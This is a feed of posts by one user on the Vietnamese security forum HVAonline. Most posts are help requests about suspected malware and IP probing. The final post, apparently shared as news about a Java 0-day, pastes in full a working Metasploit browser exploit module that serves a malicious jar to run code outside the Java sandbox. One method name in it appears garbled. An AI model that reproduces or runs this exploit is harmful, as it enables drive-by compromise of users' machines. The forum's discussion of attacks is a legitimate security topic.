<![CDATA[Messages posted by "kOi92"]]> /hvaonline/posts/listByUser/267744.html JForum - http://www.jforum.net Các pro vào cho em xin kiến /hvaonline/posts/preList/43726/270732.html#270732 /hvaonline/posts/preList/43726/270732.html#270732 GMT Các pro vào cho em xin kiến /hvaonline/posts/preList/43726/270731.html#270731 /hvaonline/posts/preList/43726/270731.html#270731 GMT Hiện tượng lạ

kuthihacker wrote:
E mới vào nghề, kinh nghiệm còn non kém, gần đây có khá nhiều IP quôc tế nó dò xét đến những mục nhạy cảm nên e khoá hết IP QT rùi, nhưng lại xuất hiện thằng này, e ko hiểu cái này là thế này, mong các bản giải đáp giúp
:( :( :( Cái này chứng tỏ thằng này sài hide IP nhưng vì e đã cấm nên nó đánh sài cách trên
nhưng e ko hiểu sao nó làm dc như zậy 
dò toàn mục data nhỉ :-/ ]]>
/hvaonline/posts/preList/43717/270716.html#270716 /hvaonline/posts/preList/43717/270716.html#270716 GMT
Ai xem hộ em cái file này có phải virus không thế /hvaonline/posts/preList/43714/270715.html#270715 /hvaonline/posts/preList/43714/270715.html#270715 GMT Ai xem hộ em cái file này có phải virus không thế

bolzano_1989 wrote:
Tìm cách lấy file gửi lên mới có người xem cho bạn chứ. 
không nén vào đc. nén vào thì mở thử ra file trống không có cái gi cả. tình hình là cầm búa đập thôi :( ]]>
/hvaonline/posts/preList/43714/270689.html#270689 /hvaonline/posts/preList/43714/270689.html#270689 GMT
Ai xem hộ em cái file này có phải virus không thế

tvdsubo273 wrote:
thưỜng Virus Chỉ lÀ 1 cÁi frie thÔi....chỨ ít khi lÀ nguyÊn Ổ đĩA lẮm........nẾu bẠn đà quét virus rỒi mOà không đưỢc.......thì đó cÓ thỂ lÀ 1 chương trình nÀo đÓ mào bẠn cÀi thiẾu.......nÊn kO kích vÀo đưỢc.........  
Mình rất ý khi cài chương trình vào ổ C lắm. Thường thì cài vào đó nó liên quan tới Win. nếu mà lỡ tay xoá nhầm thì xong rồi. nhưng cái file này tên rất chuối lại còn không xoá hoàn toàn đi đc. vài ngày sau lại thấu mặt nó. Mà dạo này máy chậm bất thường lắm. down kaspersky về quét thì chỉ đc 2 con trong máy thôi. không biết là do cái gì. mà để ý cFos Speed dạo này thấy nhiều kết nối lạ lắm. thỉnh thoảng máy không vào mạng. để ý wifi không ai dùng nhưng có thấy báo máy có kết nối mạng khoảng 1 - 2 phút speed lên tới 3k, tốc độ úp file lên tới 8k(lúc đấy máy rất chậm :( ). không biết có khi nào thành Zom rôi không :-S ]]>
/hvaonline/posts/preList/43714/270682.html#270682 /hvaonline/posts/preList/43714/270682.html#270682 GMT
Ai xem hộ em cái file này có phải virus không thế

nhiepnhuphong wrote:
Dùng phần mềm diệt virus quét ổ C thử đi. 
mình quét rồi. Ổ C có 2 con virus, nhưng ở File khác. không phải ở File này. Cách cuối cùng mới phải cài lại win. nhưng không muốn một tí nào. ai giúp em cái :( ]]>
/hvaonline/posts/preList/43714/270676.html#270676 /hvaonline/posts/preList/43714/270676.html#270676 GMT
Ai xem hộ em cái file này có phải virus không thế
[/url]]]>
/hvaonline/posts/preList/43714/270672.html#270672 /hvaonline/posts/preList/43714/270672.html#270672 GMT
Tình hình là mọi người giúp em với /hvaonline/posts/preList/43687/270574.html#270574 /hvaonline/posts/preList/43687/270574.html#270574 GMT Tình hình là mọi người giúp em với /hvaonline/posts/preList/43687/270532.html#270532 /hvaonline/posts/preList/43687/270532.html#270532 GMT HVA News - Lỗi 0-day mới cực kỳ nguy hiểm trong Java Runtime http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java 7 Applet Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability Discovery 'jduck', # metasploit module 'sinn3r', # metasploit module 'juan vazquez', # metasploit module ], 'References' => [ #[ 'CVE', '' ], #[ 'OSVDB', '' ], [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ], [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ] ], 'Platform' => [ 'java', 'win', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Arch' => ARCH_JAVA, } ], [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 26 2012' )) end def on_request_uri( cli, request ) if not request.uri.match(/\.jar$/i) if not request.uri.match(/\/$/) send_wwwect(cli, get_resource() + '/', '') return end print_status("#{self.name} handling request") send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) return end paths = [ [ "Exploit.class" ] ] p = regenerate_payload(cli) jar = p.encoded_jar paths.each do |path| 1.upto(path.length - 1) do |idx| full = path[0,idx].join("/") + "/" if !(jar.entries.map{|e|e.name}.include?(full)) jar.add_file(full, '') end end fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path ), "rb") data = fd.read(fd.stat.size) jar.add_file(path.join("/"), data) fd.close end print_status("Sending Applet.jar") send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } ) handler( cli ) end def generate_html html = "<html><head></head>" html += "<body>" html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">" html += "</applet></body></html>" return html end end]]> /hvaonline/posts/preList/43258/268847.html#268847 /hvaonline/posts/preList/43258/268847.html#268847 GMT